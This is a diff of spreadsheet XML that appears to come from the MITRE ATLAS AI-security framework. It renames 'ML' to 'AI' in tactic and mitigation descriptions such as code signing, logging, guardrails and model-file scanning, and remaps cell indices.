-Such information may include details of the victim organizations' machine learning capabilities and research efforts.
-This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to obtain relevant ML artifacts, targeting ML capabilities used by the victim, tailoring attacks to the particular models used by the victim, or to drive and lead further Reconnaissance efforts.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">The adversary is trying to establish resources they can use to support operations.
+Such information may include details of the victim organizations' AI capabilities and research efforts.
+This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to obtain relevant AI artifacts, targeting AI capabilities used by the victim, tailoring attacks to the particular models used by the victim, or to drive and lead further Reconnaissance efforts.</t>
+  </si>
+  <si>
+    <t>The adversary is trying to establish resources they can use to support operations.
 Resource Development consists of techniques that involve adversaries creating,
 purchasing, or compromising/stealing resources that can be used to support targeting.
-Such resources include machine learning artifacts, infrastructure, accounts, or capabilities.
-These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as [ML Attack Staging](/tactics/AML.TA0001).
-</t>
+Such resources include AI artifacts, infrastructure, accounts, or capabilities.
+These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as [AI Attack Staging](/tactics/AML.TA0001).</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/tactics/AML.TA0001</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/tactics/AML.TA0000</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/tactics/AML.TA0009</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/tactics/AML.TA0014</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/tactics/AML.TA0013</t>
   </si>
   <si>
@@ -2162,12 +2323,6 @@
     <t>https://atlas.mitre.org/tactics/AML.TA0004</t>
   </si>
   <si>
-    <t>https://atlas.mitre.org/tactics/AML.TA0001</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/tactics/AML.TA0000</t>
-  </si>
-  <si>
     <t>https://atlas.mitre.org/tactics/AML.TA0006</t>
   </si>
   <si>
@@ -2186,6 +2341,9 @@
     <t>AML.M0023</t>
   </si>
   <si>
+    <t>AML.M0017</t>
+  </si>
+  <si>
     <t>AML.M0024</t>
   </si>
   <si>
@@ -2225,9 +2383,6 @@
     <t>AML.M0025</t>
   </si>
   <si>
-    <t>AML.M0017</t>
-  </si>
-  <si>
     <t>AML.M0003</t>
   </si>
   <si>
@@ -2261,87 +2416,90 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--62d0ba49-7343-48de-a756-ac5fdaf98c8f</t>
-  </si>
-  <si>
-    <t>course-of-action--e89d6eec-150c-4308-bd3e-fc51e5efdfa6</t>
-  </si>
-  <si>
-    <t>course-of-action--caf6e938-cf87-4a2c-a752-206b930f3c01</t>
-  </si>
-  <si>
-    <t>course-of-action--1a62c89b-d515-4e98-bbcd-c5e6ef78fe42</t>
-  </si>
-  <si>
-    <t>course-of-action--0fc686a3-466f-45bf-a95e-65304bc43666</t>
-  </si>
-  <si>
-    <t>course-of-action--5ec3bfe0-f7be-4286-bce1-ae762a23e79f</t>
-  </si>
-  <si>
-    <t>course-of-action--e0beab85-34fd-4915-a477-ed5efeaf9e0d</t>
-  </si>
-  <si>
-    <t>course-of-action--e2be373b-c7b9-449f-8c50-1e516d162969</t>
-  </si>
-  <si>
-    <t>course-of-action--b385f3b5-725c-45a8-b7e6-f56b35f75a4a</t>
-  </si>
-  <si>
-    <t>course-of-action--10c68f9d-a736-4d85-93bc-b0e36084cc9f</t>
-  </si>
-  <si>
-    <t>course-of-action--504b48c4-05c1-4b29-912a-2ba8db9631a9</t>
-  </si>
-  <si>
-    <t>course-of-action--6a041684-03a2-4874-9577-67749bf98de0</t>
-  </si>
-  <si>
-    <t>course-of-action--0e73d209-afa9-4540-a8c4-244bc9f604ea</t>
-  </si>
-  <si>
-    <t>course-of-action--ed176010-c43b-4055-b421-2a6f92b95504</t>
-  </si>
-  <si>
-    <t>course-of-action--dd73141b-4e51-4f90-8120-45b4d113f420</t>
-  </si>
-  <si>
-    <t>course-of-action--fbc6f93a-a8fd-4097-80e4-9b9da41cef4b</t>
-  </si>
-  <si>
-    <t>course-of-action--e54bb18b-c1a7-4700-baac-3de8a51c1097</t>
-  </si>
-  <si>
-    <t>course-of-action--954d9fe9-e75a-4a72-9db1-091ad28d23f8</t>
-  </si>
-  <si>
-    <t>course-of-action--ead3a51b-6ed6-420a-9953-fe2f6b8816dd</t>
-  </si>
-  <si>
-    <t>course-of-action--5fd900ac-6e6a-4ee7-9a11-ef58129cea5c</t>
-  </si>
-  <si>
-    <t>course-of-action--317157f6-b4a4-4887-99cc-7e900fb7e35a</t>
-  </si>
-  <si>
-    <t>course-of-action--08c232f3-a786-4fdb-89cd-bbd76943fd10</t>
-  </si>
-  <si>
-    <t>course-of-action--80c18af0-9956-4f37-b1fd-49c3785d2243</t>
-  </si>
-  <si>
-    <t>course-of-action--9f8223a7-4fd2-44de-8854-d512dfc7fb09</t>
-  </si>
-  <si>
-    <t>course-of-action--8d8c433c-2b16-438c-b3cc-7a91b2f24ef9</t>
-  </si>
-  <si>
-    <t>course-of-action--698b729b-7703-4fd2-85a2-219386f1c37f</t>
+    <t>course-of-action--d28fd806-c567-4cce-bcef-4981908f8dbc</t>
+  </si>
+  <si>
+    <t>course-of-action--0ecbe6e0-865e-439c-925b-da558632bda6</t>
+  </si>
+  <si>
+    <t>course-of-action--c887ee08-5448-41bb-a94a-e53bfedfa8b7</t>
+  </si>
+  <si>
+    <t>course-of-action--99b7b032-7353-436b-a200-f52fca92cb11</t>
+  </si>
+  <si>
+    <t>course-of-action--73e8d31a-5f48-4415-8f74-4f443a853050</t>
+  </si>
+  <si>
+    <t>course-of-action--35a8cc31-c63d-4fb9-90c0-1dbba7bc724a</t>
+  </si>
+  <si>
+    <t>course-of-action--8ec8b9e0-1934-4298-a1b3-f7c90bd9d864</t>
+  </si>
+  <si>
+    <t>course-of-action--633d5427-a2a6-4453-8675-7378e1b870e2</t>
+  </si>
+  <si>
+    <t>course-of-action--ed266799-ad60-4515-a112-fb668d12cc07</t>
+  </si>
+  <si>
+    <t>course-of-action--e0135277-437f-4b2f-a2bd-66eee71c15e5</t>
+  </si>
+  <si>
+    <t>course-of-action--b45ca9a8-2fe5-467b-b431-b9214c4f3e9b</t>
+  </si>
+  <si>
+    <t>course-of-action--2310ea30-59c9-425c-8ca7-826d267555df</t>
+  </si>
+  <si>
+    <t>course-of-action--d9f92e31-bd25-4e24-8e09-a6dadcfd8020</t>
+  </si>
+  <si>
+    <t>course-of-action--c2885145-a7d5-4100-983d-4d6de9f26425</t>
+  </si>
+  <si>
+    <t>course-of-action--56c77b01-667d-4f45-83f6-8c25e23b7e4c</t>
+  </si>
+  <si>
+    <t>course-of-action--d7a6bd67-982c-4fc0-91ec-8bf86b156055</t>
+  </si>
+  <si>
+    <t>course-of-action--4981d26b-37c3-42be-83ff-298b1fb7710f</t>
+  </si>
+  <si>
+    <t>course-of-action--564257e2-a859-4a6b-b01a-0a997fe06590</t>
+  </si>
+  <si>
+    <t>course-of-action--6b033c58-3eb4-4afb-97d1-f4ea00ae2849</t>
+  </si>
+  <si>
+    <t>course-of-action--de16f78e-92bc-427d-92da-6f71bf0a4418</t>
+  </si>
+  <si>
+    <t>course-of-action--cf12cfaa-408e-4bd0-85fb-9e068dc8699a</t>
+  </si>
+  <si>
+    <t>course-of-action--7de8e8c2-de8d-4000-b87f-385d36e1bf81</t>
+  </si>
+  <si>
+    <t>course-of-action--4237c0ff-cea4-42bd-8419-9f05ea23798b</t>
+  </si>
+  <si>
+    <t>course-of-action--50791788-7055-4498-9b8e-24737141921f</t>
+  </si>
+  <si>
+    <t>course-of-action--7ae9540a-f380-495a-8a5a-5413378defd5</t>
+  </si>
+  <si>
+    <t>course-of-action--ff8b3c2e-aeab-4d66-a7bf-86058bb77ed3</t>
   </si>
   <si>
     <t>AI Bill of Materials</t>
   </si>
   <si>
+    <t>AI Model Distribution Methods</t>
+  </si>
+  <si>
     <t>AI Telemetry Logging</t>
   </si>
   <si>
@@ -2351,10 +2509,10 @@
     <t>Code Signing</t>
   </si>
   <si>
-    <t>Control Access to ML Models and Data at Rest</t>
-  </si>
-  <si>
-    <t>Control Access to ML Models and Data in Production</t>
+    <t>Control Access to AI Models and Data at Rest</t>
+  </si>
+  <si>
+    <t>Control Access to AI Models and Data in Production</t>
   </si>
   <si>
     <t>Encrypt Sensitive Information</t>
@@ -2381,19 +2539,16 @@
     <t>Maintain AI Dataset Provenance</t>
   </si>
   <si>
-    <t>Model Distribution Methods</t>
-  </si>
-  <si>
     <t>Model Hardening</t>
   </si>
   <si>
-    <t>Passive ML Output Obfuscation</t>
+    <t>Passive AI Output Obfuscation</t>
   </si>
   <si>
     <t>Restrict Library Loading</t>
   </si>
   <si>
-    <t>Restrict Number of ML Model Queries</t>
+    <t>Restrict Number of AI Model Queries</t>
   </si>
   <si>
     <t>Sanitize Training Data</t>
@@ -2408,10 +2563,10 @@
     <t>User Training</t>
   </si>
   <si>
-    <t>Validate ML Model</t>
-  </si>
-  <si>
-    <t>Verify ML Artifacts</t>
+    <t>Validate AI Model</t>
+  </si>
+  <si>
+    <t>Verify AI Artifacts</t>
   </si>
   <si>
     <t>Vulnerability Scanning</t>
@@ -2421,16 +2576,20 @@
 This can include maintaining dataset provenance, i.e. a detailed history of datasets used for AI applications. The history can include information about the dataset source as well as well as a complete record of any modifications.</t>
   </si>
   <si>
-    <t>Implement logging of inputs and outputs of deployed AI models. Monitoring logs can help to detect security threats and mitigate impacts.</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Detect and block adversarial inputs or atypical queries that deviate from known benign behavior, exhibit behavior patterns observed in previous attacks or that come from potentially malicious IPs.
-Incorporate adversarial detection algorithms into the ML system prior to the ML model.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Adversaries can embed malicious code in ML software or models. Enforcement of code signing can prevent the compromise of the machine learning supply chain and prevent execution of malicious code.
-</t>
+    <t>Deploying AI models to edge devices can increase the attack surface of the system.
+Consider serving models in the cloud to reduce the level of access the adversary has to the model.
+Also consider computing features in the cloud to prevent gray-box attacks, where an adversary has access to the model preprocessing methods.</t>
+  </si>
+  <si>
+    <t>Implement logging of inputs and outputs of deployed AI models. Monitoring logs can help to detect security threats and mitigate impacts.
+Additionally, having logging enabled can discourage adversaries who want to remain undetected from utilizing AI resources.</t>
+  </si>
+  <si>
+    <t>Detect and block adversarial inputs or atypical queries that deviate from known benign behavior, exhibit behavior patterns observed in previous attacks or that come from potentially malicious IPs.
+Incorporate adversarial detection algorithms into the AI system prior to the AI model.</t>
+  </si>
+  <si>
+    <t>Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. Adversaries can embed malicious code in AI software or models. Enforcement of code signing can prevent the compromise of the AI supply chain and prevent execution of malicious code.</t>
   </si>
   <si>
     <t xml:space="preserve">Establish access controls on internal model registries and limit internal access to production models. Limit access to training data only to approved users.
@@ -2442,8 +2601,7 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Encrypt sensitive data such as ML models to protect against adversaries attempting to access sensitive data.
-</t>
+    <t>Encrypt sensitive data such as AI models to protect against adversaries attempting to access sensitive data.</t>
   </si>
   <si>
     <t>Guardrails are safety controls that are placed between a generative AI model and the output shared with the user to prevent undesired inputs and outputs.
@@ -2466,29 +2624,21 @@
 </t>
   </si>
   <si>
-    <t>Limit the public release of technical information about the machine learning stack used in an organization's products or services. Technical knowledge of how machine learning is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as machine learning techniques, model architectures, or datasets may be inferred.</t>
+    <t>Limit the public release of technical information about the AI stack used in an organization's products or services. Technical knowledge of how AI is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as AI techniques, model architectures, or datasets may be inferred.</t>
   </si>
   <si>
     <t>Maintain a detailed history of datasets used for AI applications. The history should include information about the dataset's source as well as a complete record of any modifications.</t>
   </si>
   <si>
-    <t xml:space="preserve">Deploying ML models to edge devices can increase the attack surface of the system.
-Consider serving models in the cloud to reduce the level of access the adversary has to the model.
-Also consider computing features in the cloud to prevent gray-box attacks, where an adversary has access to the model preprocessing methods.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Use techniques to make machine learning models robust to adversarial inputs such as adversarial training or network distillation.
-</t>
+    <t>Use techniques to make AI models robust to adversarial inputs such as adversarial training or network distillation.</t>
   </si>
   <si>
     <t xml:space="preserve">Decreasing the fidelity of model outputs provided to the end user can reduce an adversaries ability to extract information about the model and optimize attacks for the model.
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
-File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for loading of malicious libraries.
-</t>
+    <t>Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.
+File formats such as pickle files that are commonly used to store AI models can contain exploits that allow for loading of malicious libraries.</t>
   </si>
   <si>
     <t xml:space="preserve">Limit the total number and rate of queries a user can perform.
@@ -2508,28 +2658,29 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Educate ML model developers on secure coding practices and ML vulnerabilities.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Validate that machine learning models perform as intended by testing for backdoor triggers or adversarial bias.
-Monitor model for concept drift and training data drift, which may indicate data tampering and poisoning.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Verify the cryptographic checksum of all machine learning artifacts to verify that the file was not modified by an attacker.
-</t>
-  </si>
-  <si>
-    <t xml:space="preserve">Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
-File formats such as pickle files that are commonly used to store machine learning models can contain exploits that allow for arbitrary code execution.
-Both model artifacts and downstream products produced by models should be scanned for known vulnerabilities.
-</t>
+    <t>Educate AI model developers on secure coding practices and AI vulnerabilities.</t>
+  </si>
+  <si>
+    <t>Validate that AI models perform as intended by testing for backdoor triggers or adversarial bias.
+Monitor model for concept drift and training data drift, which may indicate data tampering and poisoning.</t>
+  </si>
+  <si>
+    <t>Verify the cryptographic checksum of all AI artifacts to verify that the file was not modified by an attacker.</t>
+  </si>
+  <si>
+    <t>Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.
+File formats such as pickle files that are commonly used to store AI models can contain exploits that allow for arbitrary code execution.
+These files should be scanned for potentially unsafe calls, which could be used to execute code, create new processes, or establish networking capabilities.
+Adversaries may embed malicious code in model corrupt model files, so scanners should be capable of working with models that cannot be fully de-serialized.
+Both model artifacts and downstream products produced by models should be scanned for known vulnerabilities.</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0023</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0017</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0024</t>
   </si>
   <si>
@@ -2567,9 +2718,6 @@
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0025</t>
-  </si>
-  <si>
-    <t>https://atlas.mitre.org/mitigations/AML.M0017</t>
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0003</t>
@@ -3011,7 +3159,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I105"/>
+  <dimension ref="A1:I116"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -3051,28 +3199,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>113</v>
+        <v>124</v>
       </c>
       <c r="C2" t="s">
-        <v>217</v>
+        <v>239</v>
       </c>
       <c r="D2" t="s">
-        <v>321</v>
+        <v>354</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>425</v>
+        <v>469</v>
       </c>
       <c r="F2" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G2" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H2" t="s">
-        <v>530</v>
+        <v>585</v>
       </c>
       <c r="I2" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -3080,28 +3228,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>114</v>
+        <v>125</v>
       </c>
       <c r="C3" t="s">
-        <v>218</v>
+        <v>240</v>
       </c>
       <c r="D3" t="s">
-        <v>322</v>
+        <v>355</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>426</v>
+        <v>470</v>
       </c>
       <c r="F3" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G3" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H3" t="s">
-        <v>531</v>
+        <v>586</v>
       </c>
       <c r="I3" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -3109,28 +3257,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>115</v>
+        <v>126</v>
       </c>
       <c r="C4" t="s">
-        <v>219</v>
+        <v>241</v>
       </c>
       <c r="D4" t="s">
-        <v>323</v>
+        <v>356</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>427</v>
+        <v>471</v>
       </c>
       <c r="F4" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G4" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H4" t="s">
-        <v>531</v>
+        <v>587</v>
       </c>
       <c r="I4" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -3138,28 +3286,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>116</v>
+        <v>127</v>
       </c>
       <c r="C5" t="s">
-        <v>220</v>
+        <v>242</v>
       </c>
       <c r="D5" t="s">
-        <v>324</v>
+        <v>357</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>428</v>
+        <v>472</v>
       </c>
       <c r="F5" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G5" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H5" t="s">
-        <v>532</v>
+        <v>588</v>
       </c>
       <c r="I5" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -3167,28 +3315,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>117</v>
+        <v>128</v>
       </c>
       <c r="C6" t="s">
-        <v>221</v>
+        <v>243</v>
       </c>
       <c r="D6" t="s">
-        <v>325</v>
+        <v>358</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>429</v>
+        <v>473</v>
       </c>
       <c r="F6" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G6" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H6" t="s">
-        <v>531</v>
+        <v>589</v>
       </c>
       <c r="I6" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -3196,28 +3344,28 @@
         <v>14</v>
       </c>
       <c r="B7" t="s">
-        <v>118</v>
+        <v>129</v>
       </c>
       <c r="C7" t="s">
-        <v>222</v>
+        <v>244</v>
       </c>
       <c r="D7" t="s">
-        <v>326</v>
+        <v>359</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>430</v>
+        <v>474</v>
       </c>
       <c r="F7" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G7" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H7" t="s">
-        <v>531</v>
+        <v>589</v>
       </c>
       <c r="I7" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -3225,28 +3373,28 @@
         <v>15</v>
       </c>
       <c r="B8" t="s">
-        <v>119</v>
+        <v>130</v>
       </c>
       <c r="C8" t="s">
-        <v>223</v>
+        <v>245</v>
       </c>
       <c r="D8" t="s">
-        <v>327</v>
+        <v>360</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>431</v>
+        <v>475</v>
       </c>
       <c r="F8" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G8" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H8" t="s">
-        <v>533</v>
+        <v>588</v>
       </c>
       <c r="I8" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -3254,28 +3402,28 @@
         <v>16</v>
       </c>
       <c r="B9" t="s">
-        <v>120</v>
+        <v>131</v>
       </c>
       <c r="C9" t="s">
-        <v>224</v>
+        <v>246</v>
       </c>
       <c r="D9" t="s">
-        <v>328</v>
+        <v>361</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>432</v>
+        <v>476</v>
       </c>
       <c r="F9" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G9" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H9" t="s">
-        <v>534</v>
+        <v>586</v>
       </c>
       <c r="I9" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -3283,28 +3431,28 @@
         <v>17</v>
       </c>
       <c r="B10" t="s">
-        <v>121</v>
+        <v>132</v>
       </c>
       <c r="C10" t="s">
-        <v>225</v>
+        <v>247</v>
       </c>
       <c r="D10" t="s">
-        <v>329</v>
+        <v>362</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>433</v>
+        <v>477</v>
       </c>
       <c r="F10" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G10" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H10" t="s">
-        <v>534</v>
+        <v>586</v>
       </c>
       <c r="I10" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -3312,28 +3460,28 @@
         <v>18</v>
       </c>
       <c r="B11" t="s">
-        <v>122</v>
+        <v>133</v>
       </c>
       <c r="C11" t="s">
-        <v>226</v>
+        <v>248</v>
       </c>
       <c r="D11" t="s">
-        <v>330</v>
+        <v>363</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>434</v>
+        <v>478</v>
       </c>
       <c r="F11" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G11" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H11" t="s">
-        <v>535</v>
+        <v>590</v>
       </c>
       <c r="I11" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -3341,28 +3489,28 @@
         <v>19</v>
       </c>
       <c r="B12" t="s">
-        <v>123</v>
+        <v>134</v>
       </c>
       <c r="C12" t="s">
-        <v>227</v>
+        <v>249</v>
       </c>
       <c r="D12" t="s">
-        <v>331</v>
+        <v>364</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>435</v>
+        <v>479</v>
       </c>
       <c r="F12" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G12" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H12" t="s">
-        <v>536</v>
+        <v>586</v>
       </c>
       <c r="I12" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -3370,28 +3518,28 @@
         <v>20</v>
       </c>
       <c r="B13" t="s">
-        <v>124</v>
+        <v>135</v>
       </c>
       <c r="C13" t="s">
-        <v>228</v>
+        <v>250</v>
       </c>
       <c r="D13" t="s">
-        <v>332</v>
+        <v>365</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>436</v>
+        <v>480</v>
       </c>
       <c r="F13" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G13" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H13" t="s">
-        <v>531</v>
+        <v>586</v>
       </c>
       <c r="I13" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="14" spans="1:9">
@@ -3399,28 +3547,28 @@
         <v>21</v>
       </c>
       <c r="B14" t="s">
-        <v>125</v>
+        <v>136</v>
       </c>
       <c r="C14" t="s">
-        <v>229</v>
+        <v>251</v>
       </c>
       <c r="D14" t="s">
-        <v>333</v>
+        <v>366</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>437</v>
+        <v>481</v>
       </c>
       <c r="F14" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G14" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H14" t="s">
-        <v>537</v>
+        <v>591</v>
       </c>
       <c r="I14" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="15" spans="1:9">
@@ -3428,28 +3576,28 @@
         <v>22</v>
       </c>
       <c r="B15" t="s">
-        <v>126</v>
+        <v>137</v>
       </c>
       <c r="C15" t="s">
-        <v>230</v>
+        <v>252</v>
       </c>
       <c r="D15" t="s">
-        <v>334</v>
+        <v>367</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>438</v>
+        <v>482</v>
       </c>
       <c r="F15" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G15" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H15" t="s">
-        <v>534</v>
+        <v>591</v>
       </c>
       <c r="I15" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="16" spans="1:9">
@@ -3457,28 +3605,28 @@
         <v>23</v>
       </c>
       <c r="B16" t="s">
-        <v>127</v>
+        <v>138</v>
       </c>
       <c r="C16" t="s">
-        <v>231</v>
+        <v>253</v>
       </c>
       <c r="D16" t="s">
-        <v>335</v>
+        <v>368</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>439</v>
+        <v>483</v>
       </c>
       <c r="F16" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G16" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H16" t="s">
-        <v>534</v>
+        <v>592</v>
       </c>
       <c r="I16" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="17" spans="1:9">
@@ -3486,28 +3634,28 @@
         <v>24</v>
       </c>
       <c r="B17" t="s">
-        <v>128</v>
+        <v>139</v>
       </c>
       <c r="C17" t="s">
-        <v>232</v>
+        <v>254</v>
       </c>
       <c r="D17" t="s">
-        <v>336</v>
+        <v>369</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>440</v>
+        <v>484</v>
       </c>
       <c r="F17" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G17" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H17" t="s">
-        <v>538</v>
+        <v>593</v>
       </c>
       <c r="I17" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="18" spans="1:9">
@@ -3515,28 +3663,28 @@
         <v>25</v>
       </c>
       <c r="B18" t="s">
-        <v>129</v>
+        <v>140</v>
       </c>
       <c r="C18" t="s">
-        <v>233</v>
+        <v>255</v>
       </c>
       <c r="D18" t="s">
-        <v>337</v>
+        <v>370</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>441</v>
+        <v>485</v>
       </c>
       <c r="F18" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G18" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H18" t="s">
-        <v>539</v>
+        <v>594</v>
       </c>
       <c r="I18" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="19" spans="1:9">
@@ -3544,28 +3692,28 @@
         <v>26</v>
       </c>
       <c r="B19" t="s">
-        <v>130</v>
+        <v>141</v>
       </c>
       <c r="C19" t="s">
-        <v>234</v>
+        <v>256</v>
       </c>
       <c r="D19" t="s">
-        <v>338</v>
+        <v>371</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>442</v>
+        <v>486</v>
       </c>
       <c r="F19" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G19" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H19" t="s">
-        <v>539</v>
+        <v>586</v>
       </c>
       <c r="I19" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="20" spans="1:9">
@@ -3573,28 +3721,28 @@
         <v>27</v>
       </c>
       <c r="B20" t="s">
-        <v>131</v>
+        <v>142</v>
       </c>
       <c r="C20" t="s">
-        <v>235</v>
+        <v>257</v>
       </c>
       <c r="D20" t="s">
-        <v>339</v>
+        <v>372</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>443</v>
+        <v>487</v>
       </c>
       <c r="F20" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="G20" t="s">
-        <v>529</v>
+        <v>584</v>
       </c>
       <c r="H20" t="s">
-        <v>531</v>
+        <v>592</v>
       </c>
       <c r="I20" t="s">
-        <v>548</v>
+        <v>604</v>
       </c>
     </row>
     <row r="21" spans="1:9">
@@ -3602,28 +3750,28 @@
         <v>28</v>
       </c>
       <c r="B21" t="s">
-        <v>132</v>
+        <v>143</v>
       </c>
       <c r="C21" t="s">
-        <v>236</v>
+        <v>258</v>
       </c>
       <c r="D21" t="s">
-        <v>340</v>
+        <v>373</v>
       </c>
